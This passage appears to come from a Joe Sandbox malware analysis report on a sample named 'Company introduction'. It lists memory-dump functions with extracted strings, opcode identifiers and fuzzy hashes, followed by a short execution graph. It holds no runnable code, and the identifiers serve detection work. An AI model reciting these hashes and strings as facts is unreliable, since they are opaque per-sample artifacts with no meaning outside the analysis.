                                                                                                                                                    • String ID: 9u"K$Zjsq
                                                                                                                                                    • API String ID: 0-1261923490
                                                                                                                                                    • Opcode ID: 9c760aff0c4abefe3f555e6d94bf8d221bcdbbcf2a99dbc798cc7e663b9fb1cd
                                                                                                                                                    • Instruction ID: 11d7935d2966e311dc725b57afb96e58ceb6ba1402e7ddd8a5110bac8b118fcb
                                                                                                                                                    • Opcode Fuzzy Hash: 9c760aff0c4abefe3f555e6d94bf8d221bcdbbcf2a99dbc798cc7e663b9fb1cd
                                                                                                                                                    • Instruction Fuzzy Hash: 27C124B0E15219DFCB08CFAAD58059EFBF6BF99300F14D52AD429AB224D730A942CF54
                                                                                                                                                    Function 07AE69C8 Relevance: 2.8, Strings: 2, Instructions: 295COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 9u"K$Zjsq
                                                                                                                                                    • API String ID: 0-1261923490
                                                                                                                                                    • Opcode ID: b07afb423a4aee6c64bb1eb66e623a0bd76528eb0dbb4e21db2d3b5a5f04e188
                                                                                                                                                    • Instruction ID: f780ce44a01fe4687dd2f11f11e569a5e4669bebe2f41e0cba463c79595c543b
                                                                                                                                                    • Opcode Fuzzy Hash: b07afb423a4aee6c64bb1eb66e623a0bd76528eb0dbb4e21db2d3b5a5f04e188
                                                                                                                                                    • Instruction Fuzzy Hash: 32C1F5B0E15219DFCB18CFAAD58059EFBF6BF99300F14D52AD425AB228D730A942CF54
                                                                                                                                                    Function 07AE4A58 Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: \~$$or
                                                                                                                                                    • API String ID: 0-2796768027
                                                                                                                                                    • Opcode ID: d6912433d63ce9e0a2d5f30b5bb59cb87060cc24989aedff572d67ea7fc1da8b
                                                                                                                                                    • Instruction ID: 6a9f58d5137e1a7a73feeac7a3447f18bc9c18b598c585b210e8891e24d883f8
                                                                                                                                                    • Opcode Fuzzy Hash: d6912433d63ce9e0a2d5f30b5bb59cb87060cc24989aedff572d67ea7fc1da8b
                                                                                                                                                    • Instruction Fuzzy Hash: 626158B4E1524A8FCB18CFAAD5415AEFBF6EF89310F10902AE425A7354D7349A42CF94
                                                                                                                                                    Function 07AE4A68 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: \~$$or
                                                                                                                                                    • API String ID: 0-2796768027
                                                                                                                                                    • Opcode ID: dd709d2b57309649c61f1b8330d48fccc60711a28a6621aef1c47194d7baa703
                                                                                                                                                    • Instruction ID: 5ebf672b132b90f60d2bd8c55b2eaf3ae54fb69c252eebe47f4607f56bb320f9
                                                                                                                                                    • Opcode Fuzzy Hash: dd709d2b57309649c61f1b8330d48fccc60711a28a6621aef1c47194d7baa703
                                                                                                                                                    • Instruction Fuzzy Hash: F46138B4E1521ADFCB04CFAAD5415AEFBF6EF89310F10902AE425A7354E7345A41CF94
                                                                                                                                                    Function 07AE2F59 Relevance: 2.7, Strings: 2, Instructions: 154COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 18'$aY
                                                                                                                                                    • API String ID: 0-535677718
                                                                                                                                                    • Opcode ID: ee08b0cdb98d355829b41cde821afd4fe331da3e7d2d80b5d3db7558148e2976
                                                                                                                                                    • Instruction ID: e0105dee09d7509f358650c631381b89faf9af9237faa0fc33998b6de54ff673
                                                                                                                                                    • Opcode Fuzzy Hash: ee08b0cdb98d355829b41cde821afd4fe331da3e7d2d80b5d3db7558148e2976
                                                                                                                                                    • Instruction Fuzzy Hash: 6C6115B5E1120ACFCB04CFA9C5809AEFBB6FF49310F14851AD425AB314D734A982CF95
                                                                                                                                                    Function 07AEF418 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: .dlk
                                                                                                                                                    • API String ID: 0-1029699734
                                                                                                                                                    • Opcode ID: 673233f9042b2f840d6c91f7dfd4ae3551cf25761902e37703de43ab374093b1
                                                                                                                                                    • Instruction ID: 0c5a3e8709210551bd5222070c36c4071bc4fe02650d15516896e70cb12c5874
                                                                                                                                                    • Opcode Fuzzy Hash: 673233f9042b2f840d6c91f7dfd4ae3551cf25761902e37703de43ab374093b1
                                                                                                                                                    • Instruction Fuzzy Hash: 22E1E7B4E001198FCB54CFA9D5809AEBBF6FF89304F249169E414AB356D734AD41CFA1
                                                                                                                                                    Function 07AE63E0 Relevance: 1.5, Strings: 1, Instructions: 270COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ?w=>
                                                                                                                                                    • API String ID: 0-1933253675
                                                                                                                                                    • Opcode ID: bcf9ca5787348d406389969acaeb4b09ec0b19710107e2c5282d9f195f11c59e
                                                                                                                                                    • Instruction ID: 2cdac4ec359b439b6297d0dde44ed149376f8b42155aa417455c87c3d10c98d1
                                                                                                                                                    • Opcode Fuzzy Hash: bcf9ca5787348d406389969acaeb4b09ec0b19710107e2c5282d9f195f11c59e
                                                                                                                                                    • Instruction Fuzzy Hash: 8CB12BB0D15219DFDB18CFA6D98099EFBB6FF99300F10D42AD425AB264DB349902CF50
                                                                                                                                                    Function 07AE63D2 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ?w=>
                                                                                                                                                    • API String ID: 0-1933253675
                                                                                                                                                    • Opcode ID: 5e9d151cfca1c09eec47797eb029cc573eddc6156713679bebd9a6d10291a228
                                                                                                                                                    • Instruction ID: 2a94c3ac398ccfcb44a2d5308fc51b4e27be93d8e5dc81d8e6f50e43601500cc
                                                                                                                                                    • Opcode Fuzzy Hash: 5e9d151cfca1c09eec47797eb029cc573eddc6156713679bebd9a6d10291a228
                                                                                                                                                    • Instruction Fuzzy Hash: 40B12AB1E15219DFDB18CFA6D98099EFBB2FF99300F10D52AD425AB264DB349902CF50
                                                                                                                                                    Function 07AE0011 Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ]]o
                                                                                                                                                    • API String ID: 0-2636374853
                                                                                                                                                    • Opcode ID: 8629a45e3d4dcb319d2afa69d0544d7ff09e1c9cc70040087e0d9829d03bfb4f
                                                                                                                                                    • Instruction ID: 6cee6615450609396bfdf8a55f7393cbb0aaa4f058f2c9b4146200fb51dae257
                                                                                                                                                    • Opcode Fuzzy Hash: 8629a45e3d4dcb319d2afa69d0544d7ff09e1c9cc70040087e0d9829d03bfb4f
                                                                                                                                                    • Instruction Fuzzy Hash: F17139B4E1520A9FCB04CFA9D4809EFFBB6FF89310F248166D515AB215D3749A41CFA1
                                                                                                                                                    Function 07AE0040 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ]]o
                                                                                                                                                    • API String ID: 0-2636374853
                                                                                                                                                    • Opcode ID: 4b31463a28a264c401722b3524a9fd5a2c4effe4b5dee128cca2c4dbf38bebe9
                                                                                                                                                    • Instruction ID: 23ee4d58c76bfc5d38a5e8261315d1b2dfb95221abe241ce33f4d983f9670ebb
                                                                                                                                                    • Opcode Fuzzy Hash: 4b31463a28a264c401722b3524a9fd5a2c4effe4b5dee128cca2c4dbf38bebe9
                                                                                                                                                    • Instruction Fuzzy Hash: 307117B4E1120ADFCB04CFA9D5809AFFBB6FB89310F24812AD515A7315D3749A81CFA4
                                                                                                                                                    Function 07AEF40A Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: .dlk
                                                                                                                                                    • API String ID: 0-1029699734
                                                                                                                                                    • Opcode ID: 904fa18f0c68acc7b2b8bde8b53ef7d727d828682644521e36f1fdd62063211f
                                                                                                                                                    • Instruction ID: 6704dc90563e3b4ce99dde7be4988a305b7a42f9c46c343c8d10183554ae63bd
                                                                                                                                                    • Opcode Fuzzy Hash: 904fa18f0c68acc7b2b8bde8b53ef7d727d828682644521e36f1fdd62063211f
                                                                                                                                                    • Instruction Fuzzy Hash: 59510EB5E002198FDB14CFAAD5805AEFBF6FF89304F24C16AD418A7216D7355A41CF61
                                                                                                                                                    Function 07AE4702 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: i#)6
                                                                                                                                                    • API String ID: 0-3600651614
                                                                                                                                                    • Opcode ID: ecec51caf8a963e0940835d3843e0c685b386733537ea9c7a38da7286c1a257e
                                                                                                                                                    • Instruction ID: 919337c2a65db318e07a7fb41c605df7689b2e2270ff584f8b97d3bb6b92c702
                                                                                                                                                    • Opcode Fuzzy Hash: ecec51caf8a963e0940835d3843e0c685b386733537ea9c7a38da7286c1a257e
                                                                                                                                                    • Instruction Fuzzy Hash: 69411DB0D1524A8FCB04CFE6C5416AEFBF5AF8A200F14946AD115AB254D3389B458F95
                                                                                                                                                    Function 07AE4710 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: i#)6
                                                                                                                                                    • API String ID: 0-3600651614
                                                                                                                                                    • Opcode ID: f9fdef31568bf42ca91588c7f78bcac2f4260bd982fd68c2c87bfca9d84da068
                                                                                                                                                    • Instruction ID: bf31d89a13908c1584d2ba3fa7bd0c0af0cd0ea98af89aee62e9a99eb372381e
                                                                                                                                                    • Opcode Fuzzy Hash: f9fdef31568bf42ca91588c7f78bcac2f4260bd982fd68c2c87bfca9d84da068
                                                                                                                                                    • Instruction Fuzzy Hash: 8A410CB0E1520ADBCB44DFE6C5416AEFBF9EF8A300F10D42AD125AB254D33897458F95
                                                                                                                                                    Function 07AEDB68 Relevance: .3, Instructions: 320COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1481d92f165d61ba4d3f2cb7c25a3308d86a4b60abe4370e16666cb74e755a2d
                                                                                                                                                    • Instruction ID: e67943f62466cc9b062f6c39eafc823d0dd8817d214e469c044fd50f876f7509
                                                                                                                                                    • Opcode Fuzzy Hash: 1481d92f165d61ba4d3f2cb7c25a3308d86a4b60abe4370e16666cb74e755a2d
                                                                                                                                                    • Instruction Fuzzy Hash: ABE1F7B4E001198FCB14CFA9D5809AEBBF6FF89304F248169E414AB356D735AD81CFA0
                                                                                                                                                    Function 07AED73A Relevance: .3, Instructions: 316COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 71fb0371c599ab632070b489fa3d02eca79ee00db73bf296cb06b13df31c0c29
                                                                                                                                                    • Instruction ID: 67625dc254f8b4e183b36f11a590d1ff068f8f99decb16b35b310b77debf966f
                                                                                                                                                    • Opcode Fuzzy Hash: 71fb0371c599ab632070b489fa3d02eca79ee00db73bf296cb06b13df31c0c29
                                                                                                                                                    • Instruction Fuzzy Hash: 82E1E6B4E001198FCB14DFA9D5809AEFBB6FF89305F249169E424AB356D734AD81CF60
                                                                                                                                                    Function 07AEDFB0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1e11be5ff252f6610491d70edfb1bda7c834e062050c1828721290db5b2d19fe
                                                                                                                                                    • Instruction ID: ddd3d772d647e60b1c2d4917c39b4813f75d77064ff5b03489c4b21221139c2b
                                                                                                                                                    • Opcode Fuzzy Hash: 1e11be5ff252f6610491d70edfb1bda7c834e062050c1828721290db5b2d19fe
                                                                                                                                                    • Instruction Fuzzy Hash: 2FE1F5B4E0421A8FDB14CFA9D5809AEBBF6FF89304F249169D414AB356D734AD81CF60
                                                                                                                                                    Function 07E90040 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4876339e3ba0d4d68ec4cd00803e54cfd4453f0c8806d2bbde85ca48c25a9464
                                                                                                                                                    • Instruction ID: f497993b203af5c0f111c8313bd041db1ccceccfd4dd842db023f8f07e2d4560
                                                                                                                                                    • Opcode Fuzzy Hash: 4876339e3ba0d4d68ec4cd00803e54cfd4453f0c8806d2bbde85ca48c25a9464
                                                                                                                                                    • Instruction Fuzzy Hash: ACE1D8B5E0121ACFCB14CFA9D5809AEBBF2FF89304F249169D414AB356D734A981CF61
                                                                                                                                                    Function 07AE3808 Relevance: .2, Instructions: 170COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e2164df82cccbf4469e6439c7c5a3b1eb957953f30f45f8c46acbe7ab9e0d4f9
                                                                                                                                                    • Instruction ID: a196b2e568078d91a3c23072da397e2cab8daf05c390b1be2ae6243f4babcec8
                                                                                                                                                    • Opcode Fuzzy Hash: e2164df82cccbf4469e6439c7c5a3b1eb957953f30f45f8c46acbe7ab9e0d4f9
                                                                                                                                                    • Instruction Fuzzy Hash: 0761F5B4E152099FCF08CFA9C5809EEFBF6EF89210F24946AD415FB264D7349A41CB64
                                                                                                                                                    Function 07AE3818 Relevance: .2, Instructions: 167COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d43f7e84e1dafeccc8ca946351f5289919c531ea1c761b5bd5c293b89999b2ce
                                                                                                                                                    • Instruction ID: 58994a991cafd5ad8375e79518cb15ec2c5026d11ab0cd22f674ffe1b2b323b2
                                                                                                                                                    • Opcode Fuzzy Hash: d43f7e84e1dafeccc8ca946351f5289919c531ea1c761b5bd5c293b89999b2ce
                                                                                                                                                    • Instruction Fuzzy Hash: 3271D2B4E152099FCF08CFA9C5809EEFBF6FF89210F24942AD415BB264D7349A418B64
                                                                                                                                                    Function 07AE4EA0 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 311106c27bae66e07889ba268cd454baa763fa32dd840b6ccbd57bb36825e04d
                                                                                                                                                    • Instruction ID: f3fd489e1f337a0ca73b75994be699b30a6e0cb9f77a965af993647ca385e631
                                                                                                                                                    • Opcode Fuzzy Hash: 311106c27bae66e07889ba268cd454baa763fa32dd840b6ccbd57bb36825e04d
                                                                                                                                                    • Instruction Fuzzy Hash: 8E514AB1D1525ACFCF04CFA6D4401EEFBBAAF8E601F14946AE425B7214D3389606CF55
                                                                                                                                                    Function 07AE4EB0 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0b5889d2a4bf357daf4cb1bf3be25673e3401e079fad38e172e45c33db298825
                                                                                                                                                    • Instruction ID: 9183b5f3d7739f833493e37ef14a649ca067ada960dc8c0db3a600b091f2f48f
                                                                                                                                                    • Opcode Fuzzy Hash: 0b5889d2a4bf357daf4cb1bf3be25673e3401e079fad38e172e45c33db298825
                                                                                                                                                    • Instruction Fuzzy Hash: 765107B5D15219CFCF04CFA6E4405EEFBFAEB8D601F10942AE425B6214D3789A058F69
                                                                                                                                                    Function 07AE35E8 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7eeaa5d3aa08ff6290560336525408de59bd271412f416795a6e7a2a307f7bc8
                                                                                                                                                    • Instruction ID: d45f26e7619a30bb2d0f492b5d77c16f67eea88120567a81e8838dcb13313c7c
                                                                                                                                                    • Opcode Fuzzy Hash: 7eeaa5d3aa08ff6290560336525408de59bd271412f416795a6e7a2a307f7bc8
                                                                                                                                                    • Instruction Fuzzy Hash: 1F4108B0D1560A9FCF44CFAAC5816AEFBF2BF89300F24D06AC425AB254E7359A41CF55
                                                                                                                                                    Function 07AE21C2 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ab5ce18f1dc7c1c51b1aa6287895f329b10d45e4e008cdda3ffc1bc6136b9b4b
                                                                                                                                                    • Instruction ID: c1f40b92a1f9fbe5c026bf424b64839034c70f96099e387bd2ee6651200e301c
                                                                                                                                                    • Opcode Fuzzy Hash: ab5ce18f1dc7c1c51b1aa6287895f329b10d45e4e008cdda3ffc1bc6136b9b4b
                                                                                                                                                    • Instruction Fuzzy Hash: 52417CB0E1160ADFCB04CFA9C581AAEFBBAFF85300F24D595C425A7255E7349A81CB91
                                                                                                                                                    Function 07AE35F8 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7efc64c05895ecadf82cdaae0d522ea958a287632d6844cd87d71837b1e0127f
                                                                                                                                                    • Instruction ID: 87fd2bfc983b7898279d9b25b196a4c175f8818fdb5b10cca6ba2e934c5ce278
                                                                                                                                                    • Opcode Fuzzy Hash: 7efc64c05895ecadf82cdaae0d522ea958a287632d6844cd87d71837b1e0127f
                                                                                                                                                    • Instruction Fuzzy Hash: D94108B0D1160A9BCF44CFAAC5815AEFBF6BB89300F20D06AC425BB354E7359A41CF95

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:14.4%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                    Signature Coverage:85.7%
                                                                                                                                                    Total number of Nodes:7
                                                                                                                                                    Total number of Limit Nodes:1
                                                                                                                                                    execution_graph 20296 5a89548 20297 5a89579 20296->20297 20298 5a8957e LdrInitializeThunk 20296->20298 20297->20298 20299 5a89619 20298->20299 20300 5a896d9 20299->20300 20301 5a89924 LdrInitializeThunk 20299->20301 20304 5a89328 LdrInitializeThunk LdrInitializeThunk 20299->20304 20301->20300 20304->20299

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 017D6FC8 Relevance: 6.7, Strings: 5, Instructions: 493COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
